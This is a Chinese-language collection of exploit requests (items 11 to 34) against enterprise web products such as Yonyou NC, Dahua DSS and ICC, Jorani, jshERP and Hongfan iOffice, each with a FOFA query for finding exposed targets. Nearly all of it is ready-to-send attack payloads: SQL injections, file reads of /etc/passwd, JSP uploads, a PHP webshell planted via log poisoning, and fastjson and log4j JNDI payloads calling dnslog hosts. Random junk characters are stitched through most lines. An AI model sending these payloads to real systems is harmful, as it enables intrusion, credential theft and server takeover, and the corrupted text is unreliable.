1 @2 U( ]; W* R  ]0 Y------WebKitFormBoundaryxdgaqmqu--1 }! R; J7 I% Y1 `, h; K, O+ c$ O
3 B8 F8 p# k, C6 |1 a: x% T  |

7 P" S+ f) Z( \" \& m5 O11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
2 E! d  z' Y  d! [1 fFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"/ K( e" k% T+ v, T* i
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
: u$ w& M1 B. b+ \- g+ Z% l$ S/ U. KHost: 127.0.0.1
; s( w6 q8 p8 W: _+ WPragma: no-cache! G  N' L7 f! F2 Y. |
Cache-Control: no-cache
9 k$ o' |2 ]6 V; y* q1 KUpgrade-Insecure-Requests: 1. }2 w3 a1 v. ^7 L% n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- f( \4 u/ L( G' m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 t3 I0 e6 z+ U3 G& MAccept-Encoding: gzip, deflate
1 ]* Y2 v! `0 H& |% ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 p$ _4 g, U# ?Connection: close" k- S" y0 y. d

+ E; [; Z5 ?$ ^' x8 i8 ~2 s. R8 N) n3 T( s: r0 q
12. Jorani < 1.0.2 远程命令执行
& e" o  c+ J- m2 X: AFOFA:title="Jorani"6 `0 J/ L2 s- a( B/ k5 T% Z
第一步先拿到cookie
" V0 G: R* H7 X" x$ ZGET /session/login HTTP/1.17 N. {) i% d8 T1 g3 u3 L
Host: 192.168.190.304 y" e: z# k6 D; g  z" [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 l& U  L. U9 Q+ m! {" ]8 m0 wConnection: close
2 E% X! n# Z* C9 @; f$ R0 v, M1 sAccept-Encoding: gzip2 m$ j4 |; \# q  ~  r9 l

1 O2 J. g& K' j, |4 [) G4 a: [8 O5 M# B) b& q
响应中csrf_cookie_jorani用于后续请求, O9 ]% l' `, |* T' H
HTTP/1.1 200 OK/ D* T6 \' O, ?: C+ W6 `  ]" D
Connection: close2 P9 ]- ]$ A+ e! S+ }; I1 H
Cache-Control: no-store, no-cache, must-revalidate
3 ~* R) J: ^; w8 _. @. v' `Content-Type: text/html; charset=UTF-8' ~' ~* {8 F4 I: K0 {/ X7 i# L
Date: Tue, 24 Oct 2023 09:34:28 GMT
- [$ e: z: a/ t, Q) t9 H" |. ~6 t6 eExpires: Thu, 19 Nov 1981 08:52:00 GMT- @0 j( p0 I6 ?3 D# X- {
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
3 {0 `; o( t; D. w8 W$ v5 NPragma: no-cache( V: K6 D3 b, a+ U1 O1 W
Server: Apache/2.4.54 (Debian)
; p% p9 z2 E3 O2 RSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
" r2 W9 F- O. T  ASet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
% X- ]- A( m' d: P" l7 z5 J) o, pVary: Accept-Encoding
' i6 Y3 h7 s( s' k. V1 C4 I$ r: n$ s- M6 s0 z
- V( [2 x& [9 {% J. y
POST请求,执行函数并进行base64编码
: e, V& L( N8 LPOST /session/login HTTP/1.1
0 d3 ?0 g% x3 {& X4 E$ RHost: 192.168.190.30) U; N5 G3 ^  [: C7 r- {* u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 l( b, c  C5 @  M4 @Connection: close
/ S  j" |5 v3 e9 Z* u5 BContent-Length: 252# ]6 _4 Z7 `  e' I" @8 z5 F
Content-Type: application/x-www-form-urlencoded0 Y# z" v% t* w9 L4 q
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; N6 C7 m- h5 Z" {$ Q( k4 a
Accept-Encoding: gzip! Y  f: }) g. N( F2 w/ A

9 I) ?/ d5 y9 s9 x( q7 V: B) j# Scsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor7 j: d7 c3 T1 c5 O. X6 U0 k. o5 D- w
" X0 R( T; {8 X1 S# q6 A; d
+ [& O" B7 y5 \
6 U! z+ U' d9 T( r
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
2 H4 N% c& [' SGET /pages/view/log-2023-10-24 HTTP/1.1/ D/ G1 `7 i9 W  N* d2 P. [. t" K
Host: 192.168.190.307 i0 s! }9 c" K$ \! t  d, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 B- n0 q3 I# E; nConnection: close. H6 ~$ D$ T8 S8 [/ k
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r6 v$ G. d% F+ g* K- E
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=$ z8 P3 S' U5 E  S  ?& N- S. L
X-REQUESTED-WITH: XMLHttpRequest# e/ ?7 @& D) y/ J5 ]  h/ ?
Accept-Encoding: gzip
  P: T1 h* m* F* \+ h" w* R( p/ B# Q, f; q
9 H! {0 X8 y+ c4 Q
13. 红帆iOffice ioFileDown任意文件读取
2 G. K8 H( H0 r$ H6 B( WFOFA:app="红帆-ioffice"
1 V& y2 t% J7 Z' Y% j1 ^. @' QGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1" ~5 K2 w" @. C) }: b& w+ `/ b
Host: x.x.x.x! L8 V8 `9 k2 F! x. L/ m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: r. R: u  N3 j& nConnection: close
  ^7 r  d! z) H- ?Accept: */*
+ A& O) S6 \  m) U4 {/ H; zAccept-Encoding: gzip$ ^9 }; J+ n  u6 j. q! C

3 x' \! p, D7 @4 @: d5 t! B2 N5 h1 p4 O3 v( x5 G# O% f2 T% f
14. 华夏ERP(jshERP)敏感信息泄露8 z$ _* b+ r% q8 ?" _
FOFA:body="jshERP-boot"' i& j1 M$ y3 I5 X
泄露内容包括用户名密码$ \' @) y7 j# m6 D7 N1 _
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
# K% f9 U; c2 l( Q' x+ uHost: x.x.x.x
" S+ ?( ^0 a. R. DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
9 }" N( a8 [- U; R# EConnection: close
8 ?1 m. f3 f) Y/ z3 v5 t! tAccept: */*$ ~( P: c; Q& j& N3 @+ H2 K- U" ^
Accept-Language: en/ }! X7 i: |5 w
Accept-Encoding: gzip5 N* Y) ]" ]0 _* W
) d3 z) p2 Q2 u8 }

4 \& R5 P/ \, d  M8 |% B15. 华夏ERP getAllList信息泄露
% C/ u/ f2 g. \( N% E3 I& [- UCVE-2024-0490+ }2 j* P1 T% h* _& U
FOFA:body="jshERP-boot"
" W# a  i1 ^: s' a8 a7 C8 ~泄露内容包括用户名密码
; O; Z/ }! p5 {' R' qGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
) B1 F# o* l- I( n( CHost: 192.168.40.130:100
& b5 @; e' w  C/ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36: \" s4 k/ O2 d2 ^5 A
Connection: close) A* U3 Y5 B6 _6 I: d5 ]
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' X2 I3 X+ q* a  a! Q3 d9 w9 tAccept-Language: en
) P* h) S8 |4 |3 \" Y" @# b  v# V2 osec-ch-ua-platform: Windows
! e" c6 l9 u1 c3 q2 `) \2 m2 CAccept-Encoding: gzip+ ^" h0 U) F" r& a7 {  \
* ]! z4 `8 ?) B% O' n( _4 t
8 @% z& R0 c  `# X  {. a
16.  红帆HFOffice医微云SQL注入
+ L; ~1 m4 L& w) OFOFA:title="HFOffice"6 S& E7 H3 g* R( L2 ^( b! f
poc中调用函数计算1234的md5值
7 Y4 D" t; p  JGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
  ?; f6 f& Q5 K, R  ZHost: x.x.x.x3 a# O5 N) x; b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
6 a' Z6 V# z- d5 Y# |3 H5 @! kConnection: close; x4 f! h5 g9 I4 j/ O
Accept: */*- h: K" k( F  ^* B1 \! `' d
Accept-Language: en
4 L0 Q+ I6 n* a1 ?$ p# yAccept-Encoding: gzip/ t9 d, k  l3 I  h+ N/ z3 ^

: _0 s8 a( A+ ?  @& ~9 Q. M0 P! L. k3 M
17. 大华 DSS itcBulletin SQL 注入
0 S2 e7 b- x1 c, SFOFA:app="dahua-DSS"
; C/ g7 M& m5 z& ]POST /portal/services/itcBulletin?wsdl HTTP/1.1
( g" b- u; Q' THost: x.x.x.x
/ p$ z$ u( ?4 n3 k8 P* l' DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, |5 W8 U+ a( y
Connection: close& B- j7 ^3 a' c9 I6 P
Content-Length: 345
" k: q5 N% m& A! S% Z6 KAccept-Encoding: gzip2 e' P8 n& `  W* H9 n4 E
8 C2 K8 Z5 O5 m+ x1 S0 t) @% w2 g
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
' \' }" G9 \: s" @: Y<s11:Body>
, u* K3 P: {' q0 a/ x9 }6 ^! i    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>$ q* x- w: T1 ]) y- z% ?, i
      <netMarkings>
$ o1 u4 H1 t5 n       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" u- t4 I3 M% ^* M: x      </netMarkings>
9 f& @* d8 X7 M$ n: b    </ns1:deleteBulletin>* R3 ?, n! |9 v
  </s11:Body>5 g$ X3 ?9 K+ f9 R% m" v+ b+ l
</s11:Envelope>& T$ r# d) U: L: P# r/ A
/ R& {  q+ J8 c
4 h4 }+ \5 Z  Z3 D- P; Q# [
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( Z6 h. w' |& h. ?% V- ]
FOFA:app="dahua-DSS"
( I( Z1 c& y8 U- zGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1( v0 g1 f2 y2 ~8 p! [4 c4 b1 D* [
Host: your-ip' G+ I- k. v, b3 Z0 M3 A2 F! e* @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, O! c$ Z) I# a: j3 ^8 V/ cAccept-Encoding: gzip, deflate: O) w7 Z+ t+ C
Accept: */*5 }/ }% h# A9 A, b7 ^& M
Connection: keep-alive
& {! O# E0 s* Q3 A: _0 W. \3 R* `
8 J7 T8 n/ j& c8 k7 K9 q2 A

$ e: o% a6 x( ~6 T% S19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入- S$ s. P3 a5 |1 c" B
FOFA:app="dahua-DSS"
# z2 {. b* Y1 BGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.19 V+ `0 `3 k7 A9 P
Host:
: S3 F9 R5 z% [7 vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 D1 l! v6 n6 z
Accept-Encoding: gzip, deflate
& p2 Y9 c' Q+ Q+ zAccept: */*
7 Q& G* c; I$ f% y& [Connection: keep-alive
  ~. R; B) W% p' ]+ E% s  V; D6 L
( I4 A$ c4 O/ O7 E7 k
) S, D* G; M2 t+ i/ L20. 大华ICC智能物联综合管理平台任意文件读取
* w2 L+ a: j2 @FOFA:body="*客户端会小于800*"
5 M1 i+ ~. j" S2 j/ T6 m. P3 g# hGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* _5 p+ x" W! x4 s: g
Host: x.x.x.x
+ e; u! N( o: J8 p& `* I! aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 G" y; ]) K/ BConnection: close. m  W  e9 u! V: ?
Accept: */*
/ P6 e( k! Y# m3 s8 x2 o* p9 E* _Accept-Language: en
3 z" q6 i9 d1 j. jAccept-Encoding: gzip
# n' i4 K) V9 M
$ ]0 V% R* x/ `* c( l! S3 \& ~8 m" Z
21. 大华ICC智能物联综合管理平台random远程代码执行7 n8 X3 r; a. o9 _, _3 t
FOFA:icon_hash="-1935899595"/ @& s) K% {( k* `
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& E/ x3 ^/ w" ?! R6 h
Host: x.x.x.x$ b# x2 i* {1 d# ^, h. p1 f% t* \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 D9 x& {0 S9 a$ h' n' C
Content-Length: 1616 s6 J& q* _( d& F
Accept-Encoding: gzip
3 x$ P& |, a2 K' UConnection: close8 {7 C, W* ~3 n5 V
Content-Type: application/json;charset=utf-8
& q; j& }4 i7 d, ]5 i8 \, R( W8 w
4 m0 k: P0 y5 X+ m{
; J' X7 Z5 r5 e* M"a":{- J5 z  W, G+ B) _, M- x
   "@type":"com.alibaba.fastjson.JSONObject",
8 X# ]2 G/ o1 }: k    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
6 Y1 \" T( t: `3 o  c8 c( C4 K  }""
) O. p" s6 G: u0 H* l) w}+ U' x# F6 C( [  N  O' V/ E
  U4 s$ B& k, u
- k: D8 Z/ H; [  A; S
22. 大华ICC智能物联综合管理平台 log4j远程代码执行! G0 v) G! L- s9 c3 d0 @5 G
FOFA:icon_hash="-1935899595"& c) u( G6 }: @& K1 m; e% q
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.16 d* E' d8 ~9 z# H+ G! h  A8 z  X
Host: your-ip
& C7 S: Z; U8 Z' o2 G+ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 f- w. e- o3 W$ U/ QContent-Type: application/json;charset=utf-8
; S$ V0 N& H3 y& W" F/ M  m4 p) n; r6 e5 i, a+ l
{
1 L% F) \4 n( Y1 l" N5 M- q* R"loginName":"${jndi:ldap://dnslog}"
9 N# f, q3 O* k$ P}& i+ A( {! ?* n) W: U' r! b4 G( n
% m/ W' d+ k. x3 g/ @+ ^

6 N& _  b# `9 t# ?, G" c9 a3 U+ b/ ^, v  L, d
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 x- p$ h# a) h9 \4 H
FOFA:icon_hash="-1935899595"; @4 n" r% [8 k. ?
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1  ?6 T8 L( ]  m! K2 d
Host: your-ip! }  z  ^1 q8 I* x* K* m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 S% h* T2 o; r5 {5 c4 t5 r
Content-Type: application/json;charset=utf-8- d9 u9 s, Y2 H4 b" `& R* e5 [
Accept-Encoding: gzip
3 f) N8 L- y" XConnection: close
' ~$ ^" }% J7 E9 `2 }* B3 L4 S3 Q* K7 Z$ T8 q& ^1 w7 ^
{/ B, Q7 r4 `! h3 x/ F
    "a":{
0 r  C+ {( W) ~9 f$ J        "@type":"com.alibaba.fastjson.JSONObject",& H# \) O8 y# g0 V
       {"@type":"java.net.URL","val":"http://DNSLOG"}9 ^4 ~, |( {- w. g5 R* Q. m# U( h
        }""9 W7 Q* Z* N7 w
}
; [# L  e  f+ ^/ \% N( X# M3 x/ b* C" w7 `8 A% D" {* ?( `+ s) p

$ j; f% A! k6 b. q24. 用友NC 6.5 accept.jsp任意文件上传2 g; m% {- v; d& D+ y5 T+ C
FOFA:icon_hash="1085941792"
1 J7 y  {. y% L) i( z7 O" A/ O2 uPOST /aim/equipmap/accept.jsp HTTP/1.13 m' O0 u  X# h/ I. d
Host: x.x.x.x% i2 w4 R! `, F0 x+ k# [
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
# J/ @9 ~, T6 U7 J8 \- M1 nConnection: close9 O4 S  k8 ?- w; d. v
Content-Length: 449  Q7 D" J9 x5 Q. W! t. {
Accept: */*
# Y2 G/ H$ B8 F/ _! d8 g* oAccept-Encoding: gzip) i& _3 q4 _" F: i: n
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* h. g" E' y+ z9 k

9 j5 I! A" d, A6 `5 Y-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 @* e! }: H% F0 UContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"' ~) ~( {, G6 r& r! b1 r
Content-Type: text/plain8 E! d% p' |! o# d( m6 S

* S; T6 U: \) ^! k" a( F' B<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>; C5 ~& ^! T8 [' p3 N9 W, P
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" U' v0 l3 \  u2 W3 R/ u
Content-Disposition: form-data; name="fname"# n2 U5 P- t( w' k# z6 D  P% z
, z7 g' W. x' U+ B4 y. N
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
' R4 L& z( A2 H: Q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
) H- X8 e  n& S6 ]" [. J) {2 {* h/ J3 u# f8 X/ f
1 Y+ k. B$ z; u7 B0 Y7 P2 g  n
25. 用友NC registerServlet JNDI 远程代码执行
% O+ a8 x" n' M% [: yFOFA:app="用友-UFIDA-NC"
0 a0 m; U4 O) n0 C8 JPOST /portal/registerServlet HTTP/1.1
1 q" w9 _$ J# o, \1 fHost: your-ip
1 {6 Q/ m6 H4 |& sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
; n4 M  R! r7 ]9 f) d- wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
. }8 o2 w# q% b7 tAccept-Encoding: gzip, deflate1 B" V' u; d( ~5 ~, q# o" S# K
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
6 h3 w* q2 I9 k# O9 T5 {: Z* NContent-Type: application/x-www-form-urlencoded6 b9 j+ \( G: q
! V6 A; n" D/ x9 a$ D. _4 _
type=1&dsname=ldap://dnslog4 i* L9 ^3 l7 c& ]3 v
& j/ {5 I1 J) S8 R  p! c# J
1 J1 P( Q3 t% }; f- X! [

2 U! _$ D& A5 K* t3 @26. 用友NC linkVoucher SQL注入
! ~6 k! g, ^& O5 O5 b( tFOFA:app="用友-UFIDA-NC"/ d  ]) \2 E0 i9 p4 T
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ o* D4 Q. J9 U6 q: h  x6 }Host: your-ip
  v( l8 U) ]$ t! S( c7 k  tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 X7 n8 P/ F' H+ S
Content-Type: application/x-www-form-urlencoded
2 x) Z& R' `. _  PAccept-Encoding: gzip, deflate& S' Y/ d, b! k# \) ^
Accept: */*
% q+ Q8 J0 j/ b( H- _* kConnection: keep-alive% C" i. v+ z; L3 M# g
2 n5 s  x; {; y( b9 o) D

. c( X+ U: ]$ u# g" M27. 用友 NC showcontent SQL注入
5 n% d6 k% @# bFOFA:icon_hash="1085941792"3 F& f5 C* |5 Z
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1+ l$ ^$ R8 k" |  p% D9 f1 }
Host: your-ip' v# j1 l# j7 G. F7 B: L/ y+ Z7 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ \" j: X( T/ ~6 ?. a! D
Accept-Encoding: identity  Z# _  C. {1 P8 S5 U8 O' \$ k! A  ~
Connection: close0 e# w% V6 k. @4 U
Content-Type: text/xml; charset=utf-8
/ ?: G! x+ E1 y
! T3 q" L  U% S+ l9 T6 G& N
# \7 z/ X% F  \0 P/ z3 F- n2 f28. 用友NC grouptemplet 任意文件上传; N' d8 d' r/ B$ \& I& v' U
FOFA:icon_hash="1085941792"9 K  k' i7 T6 q
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1( N, f& h: g4 J/ c
Host: x.x.x.x- W+ P2 a2 P7 E7 Z6 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.369 u1 K7 x( b8 Y8 ]7 Y$ x! f; ~
Connection: close, ]. b# h4 y; D4 }
Content-Length: 268
( d* X: K' d5 M" H( w% s6 LContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
4 }0 L( @( p- ^5 o  u* S1 XAccept-Encoding: gzip+ C7 W) Y( O1 D) ~

$ n7 P' M1 u7 V5 |9 E1 z+ Y' X3 T; ~------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( |, o  A" u" b2 F- y- s
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"8 O9 M: O1 k: M8 _, ]5 q
Content-Type: application/octet-stream& N  U& g6 A4 i( i) S0 ^7 O& S

! ?* ^* c3 y4 O<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
# d. L0 r3 r1 l0 j; ~------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
; u: T. D# {3 N3 O2 t- B7 i! ]* m) F5 s. U- y; [) O8 R

0 r5 u* m+ ~  ^3 P& R+ _# ?2 C1 J/uapim/static/pages/nc/head.jsp9 n9 m) a, s5 E2 A- @+ |, g' R& g. w
% W5 h7 {$ B9 \) R
29. 用友NC down/bill SQL注入
% c1 a9 z/ K( y4 ]7 h. sFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% o3 N' r* o; n( ~( f% V% @GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 ~+ q; ?- j* D  K, {Host: your-ip8 Y9 C* }. N3 z$ S* N& X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; A; c( E& v/ P0 W7 B: T
Content-Type: application/x-www-form-urlencoded
; J; B8 s* w& L8 i$ s$ vAccept-Encoding: gzip, deflate8 ~# Q& r4 z0 o- X9 }$ R! S
Accept: */*# Z& H9 P, v/ ]' Y$ R
Connection: keep-alive, l, H/ C% }  i, [
6 S4 p* P+ T$ f% X& h, e# d
. t. T2 X) \5 P, L6 J7 R
30. 用友NC importPml SQL注入
/ C& `$ J8 k& l3 z( m9 gFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
) E* c0 l- `. OPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1, {. i" }0 s# F! B6 O
Host: your-ip
7 I0 n' f: A. t4 ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V0 z" ]$ f; }" ?/ x# |% X1 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
- A- d* l, u9 z2 S3 |Connection: close( P. L' P. B3 ]+ s/ h6 K
( ?! G' s- l! Y
------WebKitFormBoundaryH970hbttBhoCyj9V
( D( L2 u7 _& K7 d0 @- D2 `4 D8 ~% m4 pContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
; _) H- p/ l5 RContent-Type: image/jpeg
' m* y1 B* i) }------WebKitFormBoundaryH970hbttBhoCyj9V--
/ d6 v% }' {4 _4 d
2 v# N+ P) i% Z' f) Q7 x' ?9 I6 e4 E7 s
31. 用友NC runStateServlet SQL注入( x$ n" c. u; o# w1 w
version<=6.5, `0 {: _# B9 W4 l
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"# h9 ^2 r/ N: W- Z# _) l
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.19 r- l  y' M9 A+ D: ]
Host: host
8 J6 I; q/ `' a, p+ V9 s2 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 ^7 V+ V: \; O' O: qContent-Type: application/x-www-form-urlencoded
+ v) h" R, h* r4 d! z- y2 Q
  U. J4 |) _% O3 A. R$ @) {( C# b/ {$ C3 U, _1 y
32. 用友NC complainbilldetail SQL注入
) C: [9 a0 T1 A- f3 t0 Tversion= NC633、NC65
1 {, Z# R1 s7 n- i. T4 a8 e: d  J) QFOFA:app="用友-UFIDA-NC"& d, A8 p' @, O
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) _* o+ r+ c& y. I% g) aHost: your-ip- g9 {9 d4 S' @- q9 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ k6 z" M% F. g  P# q& qContent-Type: application/x-www-form-urlencoded
6 p3 @" Q0 f( O. AAccept-Encoding: gzip, deflate
' ]9 o5 ]) x5 Y1 E) t7 Z2 g, RAccept: */*. O$ m. a4 g- x/ a; U2 ^  N
Connection: keep-alive
- s8 m9 ^* R- C: t# x: \+ d# Z$ ^+ g' ^# S+ ]
( X, k$ H$ k) N. U
33. 用友NC downTax/download SQL注入; H2 w$ [1 {, F
version:NC6.5FOFA:app="用友-UFIDA-NC"( {" n& K6 c% X- j: H2 u
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 N% }/ P3 T' ^: F* tHost: your-ip0 A9 D: B+ r8 \+ p3 x( |8 l  H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 l0 _. ~7 ]6 F1 `* v1 k3 ~Content-Type: application/x-www-form-urlencoded  @* {5 x! q) @; p' P  y
Accept-Encoding: gzip, deflate
+ w+ [) a9 Q& e" J9 j2 }( [Accept: */*
5 d: ?/ Q2 X/ C; M/ C# KConnection: keep-alive: }9 C/ W+ u: r* c1 l' s
0 u" e- }; M, P- d
% j- k. k% R" ^
34. 用友NC warningDetailInfo接口SQL注入1 }+ t+ j4 E2 E; M3 W0 H
FOFA:app="用友-UFIDA-NC") n9 P& E3 B0 ]
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.18 q  d' U% D) p8 m6 D: j6 u9 U% i
Host: your-ip) H0 j" Q$ M4 y% J3 n6 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  b2 Y" k% W7 L+ _7 M  F& I# kContent-Type: application/x-www-form-urlencoded
